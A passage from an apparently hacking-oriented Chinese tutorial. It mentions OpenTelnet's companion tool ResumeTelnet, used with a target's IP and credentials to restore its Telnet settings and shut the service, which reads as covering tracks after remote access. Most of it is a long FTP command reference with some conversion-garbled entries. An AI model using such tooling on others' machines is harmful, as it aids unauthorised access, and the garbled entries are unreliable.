• NTLM認證方式：0：不使用NTLM身份驗證；1：先嚐試NTLM身份驗證，若是失敗，再使用用戶名和密碼；2：只使用NTLM身份驗證。
• ResumeTelnet.exe (OpenTelnet附帶的另外一個工具）
• resumetelnet.exe IP　賬號　密碼 用Telnet鏈接完對方後，就用這個命令將對方的Telnet設置還原，並同時關閉Telnet服務。

FTP命令詳解

FTP命令是Internet用戶使用最頻繁的命令之一，熟悉並靈活應用FTP的內部命令，能夠大大方便使用者，並收到事半功倍之效。若是你想學習使用進行後臺FTP下載，那麼就必須學習FTP指令。
FTP的命令行格式爲：
ftp -v -d -i -n -g [主機名] ，其中

• -v 顯示遠程服務器的全部響應信息
• -n 限制ftp的自動登陸，即不使用；.n etrc文件；
• -d 使用調試方式；
• -g 取消全局文件名。

FTP使用的內部命令以下（中括號表示可選項）：

1.![cmd[args]]：在本地機中執行交互shell，exit回到ftp環境，如：！ls*.zip2.$ macro-ame[args]：執行宏定義macro-name。3.account[password]：提供登陸遠程系統成功後訪問系統資源所需的補充口令。4.append local-file[remote-file]：將本地文件追加到遠程系統主機，若未指定遠程系統文件名，則使用本地文件名。5.ascii：使用ascii類型傳輸方式。6.bell：每一個命令執行完畢後計算機響鈴一次。7.bin：使用二進制文件傳輸方式。8.bye：退出ftp會話過程。9.case：在使用mget時，將遠程主機文件名中的大寫轉爲小寫字母。10. cd remote-dir：進入遠程主機目錄。11.cdup：進入遠程主機目錄的父目錄。12.chmod mode file-name：將遠程主機文件file-name的存取方式設置爲mode，如：chmod 777 a.out。13.close：中斷與遠程服務器的ftp會話（與open對應）。14 .cr：使用asscii方式傳輸文件時，將回車換行轉換爲回行。15.delete remote-file：刪除遠程主機文件。16.debug[debug-value]：設置調試方式， 顯示發送至遠程主機的每條命令，如：deb up 3，若設爲0，表示取消debug。17.dir[remote-dir][local-file]：顯示遠程主機目錄，並將結果存入本地文件。18.disconnection：同close。19.form format：將文件傳輸方式設置爲format，缺省爲file方式。20.get remote-file[local-file]：將遠程主機的文件remote-file傳至本地硬盤的local-file。21.glob：設置mdelete，mget，mput的文件名擴展，缺省時不擴展文件名，同命令行的-g參數。22.hash：每傳輸1024字節，顯示一個hash符號（#）。23.help[cmd]：顯示ftp內部命令cmd的幫助信息，如：help get。24.idle[seconds]：將遠程服務器的休眠計時器設爲[seconds]秒。25.image：設置二進制傳輸方式（同binary）。26.lcd[dir]：將本地工做目錄切換至dir。27. ls[remote-dir][local-file]：顯示遠程目錄remote-dir， 並存入本地文件local-file。28.macdef macro-name：定義一個宏，遇到macdef下的空行時，宏定義結束。29.mdelete[remote-file]：刪除遠程主機文件。30.mdir remote-files local-file：與dir相似，但可指定多個遠程文件，如 ：mdir *.o.*.zipoutfile。31.mget remote-files：傳輸多個遠程文件。32.mkdir dir-name：在遠程主機中建一目錄。33.mls remote-file local-file：同nlist，但可指定多個文件名。34.mode[modename]：將文件傳輸方式設置爲modename， 缺省爲stream方式。35.modtime file-name：顯示遠程主機文件的最後修改時間。36.mput local-file：將多個文件傳輸至遠程主機。37.newer file-name：若是遠程機中file-name的修改時間比本地硬盤同名文件的時間更近，則重傳該文件。38.nlist[remote-dir][local-file]：顯示遠程主機目錄的文件清單，並存入本地硬盤的local-file。39.nmap[inpattern outpattern]：設置文件名映射機制， 使得文件傳輸時，文件中的某些字符相互轉換， 如：nmap 1.2.3[1，2].[2，$3]，則傳輸文件a1.a2.a3時，文件名變爲a1，a2。該命令特別適用於遠程主機爲非UNIX機的狀況。40.ntrans[inchars[outchars]]：設置文件名字符的翻譯機制，如ntrans1R，則文件名LLL將變爲RRR。41.open host[port]：創建指定ftp服務器鏈接，可指定鏈接端口。42.passive：進入被動傳輸方式。43.prompt：設置多個文件傳輸時的交互提示。44.proxy ftp-cmd：在次要控制鏈接中，執行一條ftp命令， 該命令容許鏈接兩個ftp服務器，以在兩個服務器間傳輸文件。第一條ftp命令必須爲open，以首先創建兩個服務器間的鏈接。45.put local-file[remote-file]：將本地文件local-file傳送至遠程主機。46.pwd：顯示遠程主機的當前工做目錄。47.quit：同bye，退出ftp會話。48.quote arg1，arg2...：將參數逐字發至遠程ftp服務器，如：quote syst.49.recv remote-file[local-file]：同get。50.reget remote-file[local-file]：相似於get， 但若local-file存在，則從上次傳輸中斷處續傳。51.rhelp[cmd-name]：請求得到遠程主機的幫助。52.rstatus[file-name]：若未指定文件名，則顯示遠程主機的狀態， 不然顯示文件狀態。53.rename[from][to]：更改遠程主機文件名。54.reset：清除回答隊列。55.restart marker：從指定的標誌marker處，從新開始get或put，如：restart 130。56.rmdir dir-name：刪除遠程主機目錄。57.runique：設置文件名只一性存儲，若文件存在，則在原文件後加後綴.1， .2等。58.send local-file[remote-file]：同put。59.sendport：設置PORT命令的使用。60.site arg1，arg2...：將參數做爲SITE命令逐字發送至遠程ftp主機。61.size file-name：顯示遠程主機文件大小，如：site idle 7200。62.status：顯示當前ftp狀態。63.struct[struct-name]：將文件傳輸結構設置爲struct-name， 缺省時使用stream結構。64.sunique：將遠程主機文件名存儲設置爲只一（與runique對應）。65.system：顯示遠程主機的操做系統類型。66.tenex：將文件傳輸類型設置爲TENEX機的所需的類型。67.tick：設置傳輸時的字節計數器。68.trace：設置包跟蹤。69.type[type-name]：設置文件傳輸類型爲type-name，缺省爲ascii，如：type binary，設置二進制傳輸方式。70.umask[newmask]：將遠程服務器的缺省umask設置爲newmask，如：umask 371.user user-name[password][account]：向遠程主機代表本身的身份，須要口令時，必須輸入口令，如：user anonymous my@email。72.verbose：同命令行的-v參數，即設置詳盡報告方式，ftp 服務器的全部響 應都將顯示給用戶，缺省爲on.73.?[cmd]：同help.